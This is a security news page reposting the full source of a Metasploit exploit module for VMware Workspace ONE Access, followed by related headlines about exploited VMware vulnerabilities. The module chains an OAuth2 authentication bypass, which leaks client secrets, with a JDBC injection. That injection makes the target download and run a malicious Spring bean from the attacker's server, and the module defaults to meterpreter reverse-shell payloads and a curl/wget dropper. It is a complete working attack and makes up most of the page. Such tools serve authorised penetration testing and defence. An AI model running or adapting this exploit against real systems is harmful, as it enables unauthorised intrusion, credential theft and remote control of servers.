Security
Headlines
HeadlinesLatestCVEs

Headline

Mware Workspace ONE Remote Code Execution

This Metasploit module combines two vulnerabilities in order achieve remote code execution in the context of the horizon user. The first vulnerability, CVE-2022-22956, is an authentication bypass in OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the authentication mechanism and execute any operation. The second vulnerability, CVE-2022-22957, is a JDBC injection remote code execution vulnerability specifically in the DBConnectionCheckController class’s dbCheck method which allows an attacker to deserialize arbitrary Java objects which can allow for remote code execution.

Packet Storm
#sql#vulnerability#mac#linux#js#git#java#rce#vmware#oauth#auth#postgres#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  class InvalidRequest < StandardError  end  class InvalidResponse < StandardError  end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain',        'Description' => %q{          This module combines two vulnerabilities in order achieve remote code execution in the context of the          `horizon` user. The first vulnerability CVE-2022-22956 is an authentication bypass in          OAuth2TokenResourceController ACS which allows a remote, unauthenticated attacker to bypass the          authentication mechanism and execute any operation. The second vulnerability CVE-2022-22957 is a JDBC          injection RCE specifically in the DBConnectionCheckController class's dbCheck method which allows an attacker          to deserialize arbitrary Java objects which can allow remote code execution.        },        'Author' => [          'mr_me', # Discovery & PoC          'jheysel-r7' # Metasploit Module        ],        'References' => [          ['CVE', '2022-22956'],          ['CVE', '2022-22957'],          ['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],          ['URL', 'https://github.com/sourceincite/hekate/'],          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']        ],        'DisclosureDate' => '2022-04-06',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => %i[curl wget],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'Payload' => {          'BadChars' => "\x22"        },        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'LPORT' => 5555        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  # The VMware products affected do no expose any version information to unauthenticated users.  # Attempt to exploit the auth bypass to determine if the target is vulnerable. Both the auth bypass and RCE were  # patched in the following VMware update: https://kb.vmware.com/s/article/88099  def check    @token = get_authentication_token    Exploit::CheckCode::Vulnerable('Successfully by-passed authentication by exploiting CVE-2022-22956')  rescue InvalidRequest, InvalidResponse => e    return Exploit::CheckCode::Safe("There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")  end  # Exploit OAuth2TokenResourceController ACS Authentication Bypass (CVE-2022-22956).  #  # Return the authentication token  def get_authentication_token    oauth_client = ['Service__OAuth2Client', 'acs'].sample    res_activation_token = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'generateActivationToken', oauth_client),      'method' => 'POST'    })    unless res_activation_token      raise InvalidRequest, 'No response from the server when requesting an activation token'    end    unless res_activation_token.code == 200 && res_activation_token.headers['content-type'] == 'application/json;charset=UTF-8'      raise InvalidResponse, "Unexpected response code:#{res_activation_token.code}, when requesting an activation token"    end    activation_token = res_activation_token.get_json_document['activationToken']    res_client_info = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'oauth2', 'activate'),      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'data' => activation_token    })    unless res_client_info      raise InvalidRequest, 'No response from client when sending the activation token and expecting client info in return'    end    unless res_client_info.code == 200 && res_client_info.headers['content-type'] == 'application/json;charset=UTF-8'      raise InvalidResponse, "Unexpected response code:#{res_client_info.code}, when sending the activation token and expecting client info in return"    end    json_client_info = res_client_info.get_json_document    client_id = json_client_info['client_id']    client_secret = json_client_info['client_secret']    print_good("Leaked client_id: #{client_id}")    print_good("Leaked client_secret: #{client_secret}")    post_data = "grant_type=client_credentials&client_id=#{client_id}&client_secret=#{client_secret}"    res_access_token = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'SAAS', 'auth', 'oauthtoken'),      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'data' => post_data    })    unless res_access_token      raise InvalidRequest, 'No response from the server when requesting the access token'    end    unless res_access_token.code == 200 && res_access_token.headers['content-type'] == 'application/json;charset=UTF-8' && res_access_token.get_json_document['access_token']      raise InvalidResponse, 'Invalid response from the server when requesting the access token'    end    res_access_token.get_json_document['access_token']  end  # Serve the files for the target machine to download.  # If the request to the server ends in .xml the victim is requesting the spring bean generated by payload_xml method.  # If the request doesn't in .xml the victim is requesting the linux dropper payload.  def on_request_uri(cli, request)    vprint_status("on_request_uri - Request '#{request.method} #{request.uri}'")    if request.to_s.include?('.xml')      vprint_status('Sending XML response: ')      send_response(cli, @payload_xml, { 'Content-Type' => 'application/octet-strem' })      vprint_status('Response sent')    else      vprint_status('Sending PAYLOAD: ')      send_response(cli, generate_payload_exe(code: payload.encoded), { 'Content-Type' => 'application/octet-strem' })    end  end  # Generates the malicious spring bean that will be hosted by the metasploit http server and downloaded and run by the victim  #  # Returns an XML document containing the payload.  def generate_payload_xml(cmd)    bean = ''    builder = ::Builder::XmlMarkup.new(target: bean, indent: 2)    builder.beans(xmlns: 'http://www.springframework.org/schema/beans', 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance', 'xsi:schemaLocation': 'http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd') do      builder.bean(id: 'pb', class: 'java.lang.ProcessBuilder', 'init-method': 'start') do        builder.constructor do          builder.list do            builder.value('/bin/sh')            builder.value('-c')            builder.value(cmd)          end        end      end    end    bean.gsub!('constructor', 'constructor-arg')    vprint_status(bean)    bean  end  # Calls the vulnerable dbCheck method in order to download and run the payload the module is hosting.  def trigger_jdbc_rce(jwt, sub_cmd)    # jdbc_uri  = "jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{filename}"    jdbc_uri = "jdbcUrl=jdbc%3Apostgresql%3A%2F%2Flocalhost%3A1337%2Fsaas%3FsocketFactory%3Dorg.springframework.context.support.FileSystemXmlApplicationContext%26socketFactoryArg%3Dhttp%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{@payload_name}&dbUsername=&dbPassword"    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'SAAS', 'API', '1.0', 'REST', 'system', 'dbCheck'),      'method' => 'POST',      'Content-Type' => 'application/x-www-form-urlencoded',      'Connection' => 'keep-alive',      'cookie' => "HZN=#{jwt}",      'data' => jdbc_uri    })    fail_with(Failure::Unreachable, "No response from the request to trigger the following sub command: #{sub_cmd}") unless res    fail_with(Failure::UnexpectedReply, "Unexpected response from the request to trigger the following sub command: #{sub_cmd}") unless res.code == 406 && res.body == '{"success":false,"status":406,"message":"database.connection.notSuccess","code":406}'  end  def execute_command(cmd, opts = {})    vprint_status("Executing the following command: #{cmd}")    @payload_xml = generate_payload_xml(cmd)    trigger_jdbc_rce(opts[:jwt], cmd)  end  # Instruct the user to exploit CVE-2022-22960  def on_new_session(_client)    print_good('Now background this session with "bg" and then run "resource run_cve-2022-22960_lpe.rc" to get a root shell')  end  def exploit    unless @token      begin        @token = get_authentication_token      rescue InvalidRequest => e        fail_with(Failure::Unreachable, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")      rescue InvalidResponse => e        fail_with(Failure::UnexpectedReply, "There was an error exploiting the authentication by-pass vulnerability (CVE-2022-22956): #{e.class}, #{e}")      end    end    @payload_name = Rex::Text.rand_text_alpha(4..12) + '.xml'    start_service('Path' => "/#{@payload_name}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded, { jwt: @token })    when :linux_dropper      execute_cmdstager({ jwt: @token })    else      fail_with(Failure::BadConfig, 'Invalid target specified')    end  endend

Related news

2022's most routinely exploited vulnerabilities—history repeats

Categories: Exploits and vulnerabilities Categories: News Tags: Zoho ManageEngine Tags: CVE-2021-40539 Tags: Log4Shell Tags: CVE-2021-44228 Tags: CVE-2021-13379 Tags: ProxyShell Tags: CVE-2021-34473 Tags: CVE-2021-31207 Tags: CVE-2021-34523 Tags: CVE-2021-26084 Tags: Atlassian Tags: CVE-2022-22954 Tags: CVE-2022-22960 Tags: CVE-2022-26134 Tags: CVE-2022-1388 Tags: CVE-2022-30190 Tags: Follina What can the routinely exploited vulnerabilities of 2022 tell us, and what do we think will make it on to next year's list? (Read more...) The post 2022's most routinely exploited vulnerabilities—history repeats appeared first on Malwarebytes Labs.

Major Cybersecurity Agencies Collaborate to Unveil 2022's Most Exploited Vulnerabilities

A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five

VMware Workspace ONE Access Privilege Escalation

This Metasploit module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with the uid 1001 to escalate their privileges to root access.

VMWare vulnerabilities are actively being exploited, CISA warns

CISA has issued severe warnings about disclosed vulnerabilities in VMWare products that are actively being exploited, probably by APT threat actors. The post VMWare vulnerabilities are actively being exploited, CISA warns appeared first on Malwarebytes Labs.

VMware Releases Patches for New Vulnerabilities Affecting Multiple Products

VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior

April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell

Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.

Critical VMware Bug Exploits Continue, as Botnet Operators Jump In

A critical VMware bug tracked as CVE-2022-22954 continues to draw cybercriminal moths to its remote code-execution flame, with recent attacks focused on botnets and Log4Shell.

CVE-2022-22954: VMSA-2022-0011

VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.

CVE-2022-22954: VMSA-2022-0011

VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.

CVE-2022-22954: VMSA-2022-0011

VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution